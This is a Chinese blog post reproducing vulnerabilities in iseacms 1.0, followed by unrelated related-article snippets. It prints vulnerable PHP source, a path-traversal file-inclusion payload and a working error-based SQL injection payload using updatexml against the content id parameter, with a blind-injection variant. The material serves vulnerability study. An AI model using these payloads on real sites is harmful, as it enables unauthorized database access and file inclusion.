程序员经验分享-hwhale

iseacms1.0漏洞复现

2023-11-05

iseacms1.0漏洞复现

Index.php源码

<?php
error_reporting(0);
$file=addslashes($_GET['r']);
$action=$file==''?'index':$file;
include('files/'.$action.'.php');
?>

文件包含,参数转义了(' " 0),利用方式有限
在网站目录有phpinfo.php文件的前提下,payload为“index?r=../test”。

files/content.php文件
cca7c7d0d18f835f633edd2e5855baa.png
第十九行没有单引号闭合,第八行有使用addslashes转义,但是不影响构造语句
打开mysql记录日志

set global general_log_file='E:\\tmp\\mysql.log';
set global general_log=on;

日志中看到原语句

UPDATE content SET hit = hit+1 WHERE id=18 # 原语句
UPDATE content SET hit = hit+1 WHERE id=18 and updatexml(1,concat(0x7e,(select database()),0x7e),1) # 拼接后

Payload为“?r=content&cid=18 and updatexml(1,concat(0x7e,(select database()),0x7e),1)”
14f4401ec6a943995eecdd58e4f964d.png
也可以使用盲注,文章标题后有点击量,增加为真,不变为假
files/software.php第十三行同样方法

标签: 漏洞复现

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

iseacms1.0漏洞复现 的相关文章

  • 数据仓库、数据开发面经

    目录 一 前言 二 关于内推or猎头or招聘软件的选择 三 面试形式 四 面试流程选择

  • 【经典蓝牙】 蓝牙HFP层协议分析

    HFP 概述 HFP概念介绍 HFP Hands Free Profile 是蓝牙免提协议 可以让蓝牙设备对对端蓝牙设备的通话进行控制 例如蓝牙耳机控制手机通话的接听 挂断 拒接 语音拨号等 HFP中蓝牙两端的数据交互是通过定义好的AT指令

  • Symbol SysTick_Handler multiply defined (by port.o and bsp_timer.o).

    Symbol SysTick Handler multiply defined by port o and bsp timer o Symbol PendSV Handler multiply defined by port o and s

  • PADS9.5光绘文件输出教程

    目录 光绘文件输出前准备 先执行灌铜 特别注意混合分割层 开短路检查 注意安全间距的验证选项 光绘文件生成 线层 丝印层 阻焊层 钢网层 钻孔图 数控钻孔 线层 阻焊层 丝印层 钢网层GERBER系统生成 钻孔图和数控钻孔生成 对软件生成光

  • Hadoop001存储模型

    HDFS 存储模型 思想 1 化整为0 2 并行计算 第一步 如果一个文件非常非常大 单台服务器的内存无法处理这样一个大文件 无法一次性加载到内存中 可以对文件切割成若干个小文件 第二步 为了达到提升计算效果的目的 可以把切割的小文件分散发

  • c语言面向过程到面向对象,c++ 面向过程 c语言面向对象:列表

    主要利用结构体和函数指针 实现面向对象编程中的封装 继承和多态 base htypedef struct BaseClass int m Data void xjbclz 2016年06月04日 22 35 1272 我们知道嵌入式是在操作

  • 设置windows宿主机内的Linux虚拟机的端口开放

    比如希望开放的是windows内的Linux虚拟机 IP地址 172 30 2 1611 端口 27017 则在windows主机中 用管理员权限打开控制台 并输入 netsh interface portproxy add v4tov4

  • JavaScript 函数防抖(debounce)的实现

    函数防抖是什么 函数防抖是指对于在事件被触发n秒后再执行的回调 如果在这n秒内又重新被触发 则重新开始计时 是常见的优化 适用于 表单组件输入内容验证 防止多次点击导致表单多次提交 等情况 防止函数过于频繁的不必要的调用 代码实现 思路 用

  • tomcat部署项目,ip+端口直接访问项目的三种方式

    部署web项目 需要ip 端口 项目名 路径访问项目 如localhost 8080 springmvc xxx 现在想去掉项目名springmvc 直接输入 localhost 8080 就能访问 三种配置 方式一 项目打war包放到to

  • Makefile文件的简单编写

    参考 MakeFile文件是什么 内容 工作原理 作用 使用 嵌入式操作系统linux篇 书 Makefile伪目标 GNU make中文手册 pdf 在嵌入式开发中 一个工程中的源文件是非常多的 如果一个个编译会很麻烦 Makefile的

  • 寻找SQL注入点

    如果要对一个网站进行SQL注入攻击 首先就需要找到存在SQL注入漏洞的地方 也就是寻找所谓的注入点 可能的SQL注入点一般存在于登录页面 查找页面或添加页面等用户可以查找或修改数据的地方 最常用的寻找SQL注入点的方法 是在网站中寻找如下形

  • PyTorch错误定位系列之DDP训练中 double free or corruption (out)

    背景 最近觉得单卡训练有点慢了 在纠结pytorch lightning和原始distributed训练中选择哪里 最后 从学习的角度选了原生的单机多卡训练 DDP 方式 结果 就把自己埋坑里了 问题 代码写完后 通过torch distr

  • Transformer 模型详解

    本内容主要介绍 Transformer 模型的具体实现 转载自 Transformer 模型详解 https blog csdn net benzhujie1245com article details 117173090 文章目录 1 T

  • npm : 无法加载文件 D:\appCache\nodejs\node_global\npm.ps1,因为在此系统上禁止运行脚本。

    鄙人在vscode 下面打开终端运行 npm init y 时 发现居然报错 报错的内容是 npm 无法加载文件 D appCache nodejs node global npm ps1 因为在此系统上禁止运行脚本 问题原因 在此系统上禁

  • uniapp之请求拦截器和响应拦截器的使用

    拦截器 目录如下 api js api配置 env js 环境配置 interceptors 拦截器 index js 导出配置 main js 注入 页面使用 页面展示 目录如下 api js api配置 export const api

  • 以太网数据链路层、Ethernet_II帧格式、IEEE802.3帧格式,以太网的MAC地址的组成,ARP地址解析协议的工作原理,单播帧、组播帧、广播帧的区别

    目录 数据链路层 以太网 链路一般分为两种 以太网的MAC地址 以太网帧格式 Ethernet II帧格式 IEEE802 3帧格式 帧格式 编辑地址解析协议 ARP 免费arp 代理arp 目标MAC地址没有怎么办 什么是单播帧 什么是组

  • 第四章:项目整合管理 - (4.1 制定项目章程)

    制定项目章程 1 编写一份正式批准项目并授权项目经理在项目活动中使用组织资源文件的过程 2 本过程的主要作用 明确项目与组织战略之间的关系 确立项目的正式地位 并展示组织对项目的承诺 3 本过程仅开展一次或仅在项目的预定义点开展 项目发起人

  • CentOS安装Docker

    目录 一 前置条件 二 安装Docker 安装方式 配置镜像仓库 执行安装 启动Docker 检查Docker是否可以正常运行 三 卸载Docker 卸载Docker核心组件 清理Docker相关资源 参考文档 一 前置条件 安装 Dock

  • 机械臂控制-2

    创建机制或机器人 按照以下步骤在RoboDK中创建新机制或机器人 1 选择实用程序 模型机制或机器人 2 选择要创建的机制或机械手的类型 3 选择代表机构原点的坐标系 4 为每个关节选择一个对象 移动机构或机器人的一部分 5 按相应图像中的

  • 优酷网视频存储架构

    优酷网视频存储架构 http blog csdn net starxu85 article details 5673029 挖掘优酷网的架构是怎样的 http datacenter watchstor com infra 135196 ht

随机推荐

  • RuntimeException和Exception区别

    1 java将所有的错误封装为一个对象 其根本父类为Throwable Throwable有两个子类 Error和Exception 2 Error是Throwable 的子类 用于指示合理的应用程序不应该试图捕获的严重问题 大多数这样的错

  • git merge与git rebase详解

    参考 http t csdn cn CkVrR https blog csdn net weixin 42310154 article details 119004977 一 简单图示 1 merge 2 rebase 经验 一般来说 不推

  • 机器学习 day18(用Tensorflow搭建一个神经网络)

    1 之前搭建神经网络的方法 先初始化输入数据X 创建layer 1并计算激活值a1 创建layer 2并计算激活值a2 这是前向传播代码的显式形式 2 另一种简单些的创建神经网络的方法 创建layer 1和layer 2与前一种方法相同 但

  • 17_分布式文档系统_document的全量替换、强制创建以及lazy delete机制

    课程大纲 1 document的全量替换 2 document的强制创建 3 document的删除 1 document的全量替换 1 语法与创建文档是一样的 如果document id不存在 那么就是创建 如果document id已经

  • Swagger

    第一节 Swagger 简介 1 企业开发所面临的问题 在前后端分离开发的情况下 前端开发人员经常抱怨后端开发人员给的接口文档与实际情况不一致 后端开发人员觉得编写接口文档太过于消耗精力 而且更新也不及时 以至于前后端开发人员经常出现争吵的

  • 【kickstart 2021 round C】前三题python题解

    第一题 题目 给定长度为N的字符串S 它是由字母表上的前K个字母构成 问字典序小于S且长度为N的回文字符串 由字母表上的前K个字母构成 有多少个 解释 参考官方题解 计算多少个长度为N 2的字符串的字典序小于S math ceil N 2

  • 动态动态规划(DDP)

    1 Problem E Codeforces 一 题目大意 给你一个无向图 第i和i 1条边的权值是w i 问你每个点不在自己原本的点的代价是多少 会有q组询问 表示修改第i条边的权值 二 解题思路 可以观察到 完成这个操作需要每条边经过两

  • [LeetCode]初级算法-字符串- 实现strStr()

    标题 实现strStr 实现 strStr 函数 给定一个 haystack 字符串和一个 needle 字符串 在 haystack 字符串中找出 needle 字符串出现的第一个位置 从0开始 如果不存在 则返回 1 示例 1 输入 h

  • linux防火墙启动、停止、查看

    停止 防火墙 service iptables stop 启动防火墙 service iptables start 查看防火墙配置 iptables L n 修改的内容只是暂时保存在内存中 如果重启后还要生效 则要保存一下 service

  • Web Storage是什么?Web Storage详解

    Web Storag是HTML5引入的一个非常重要的功能 可以将数据存储在本地 如保存用户的偏好设置 复选框的选中状态 文本框默认填写的值等 用户在浏览器中刷新网页时 网页通过Web Storage就可以知道用户之前所做的一些修改 而不需要

  • Autoware 1.14(WSL2) 与LG SVL Simulator(Win11)联合仿真

    参考Couldn t find executable named rqt lgsvl simulator configurator below home autoware Autoware ros in li4692625的博客 CSDN博

  • Hyperledger Fabric核心配置文件(1)

    1 core yaml core yaml配置文件是Peer节点的示例配置文件 具体路径在fabric samples config目 录下 该core yaml示例配置文件共指定了如下六大部分内容 1 日志部分 日志记录级别有6种 CRI

  • JDBC访问数据库

    一 简介 JDBC 全称 Java DataBase Connection 数据库连接技术 可以根据驱动包连接不同类型的数据库 二 JDBC API JDBC API是java中位于java sql包下的一个数据库访问统一接口 通过它来跟数

  • 无监督学习KMeans学习笔记和实例

    KMeans算法是一种简单的算法 能够快速 高效的对数据集进行聚类 一般只要通过几次迭代即可 KMeans可以作为一种聚类工具 同时也可以作为一种降维的方式进行特征降维 KMeans可以通sklearn cluster kmeans中进行调

  • 测试 开发 5 年从外包 18K 跳槽去字节 28K+12,啃完这份笔记你也可以

    软件测试是一个付出就有回报的工作 可能很多人会说软件测试就是吃青春饭 然而其他工作又何尝不是 没有哪一家公司养尸位素餐之人 大龄员工有被辞退的 也有没被辞退的 干任何职业 抱着一劳永逸的心态 在岗位上开始混的中青年 早就该辞了 粉丝小王转行

  • 测试方法——边界值法

    边界值测试方法 边界值方法是一种比较常用的测试方法 在很多软件测试中都会应用到 一 应用条件 只要有输入框输入数据的地方 就可以用边界值这一方法来测试 一般与等价类划分共同使用 找到有效数值和无效数值之间的分界点及其两边的点进行测试 二 测

  • Jmeter进阶使用指南-使用参数化

    Apache JMeter是一个广泛使用的开源负载和性能测试工具 在进行性能测试时 我们经常需要模拟不同的用户行为和数据 这时候 参数化就显得尤为重要 此文主要介绍如何在JMeter中使用参数化 什么是参数化 参数化是一种将静态值替换为动态

  • 深入理解HashMap和LinkedHashMap的区别

    简介 我们知道HashMap的变量顺序是不可预测的 这意味着便利的输出顺序并不一定和HashMap的插入顺序是一致的 这个特性通常会对我们的工作造成一定的困扰 为了实现这个功能 我们可以使用LinkedHashMap LinkedHashM

  • 【配电变电站的最佳位置和容量】基于遗传算法的最优配电变电站放置(Matlab代码实现)

    欢迎来到本博客 博主优势 博客内容尽量做到思维缜密 逻辑清晰 为了方便读者 座右铭 行百里者 半于九十 本文目录如下 目录 1 概述 2 运行结果 3 参考文献 4 Matlab代码实现 1 概述 基于遗传算法的最优配电变电站放置 为了实现

  • iseacms1.0漏洞复现

    iseacms1 0漏洞复现 作者 admin 时间 2021 06 29 分类 漏洞复现 Index php源码 文件包含 参数转义了 0 利用方式有限在网站目录有phpinfo php文件的前提下 payload为 index r te

热门标签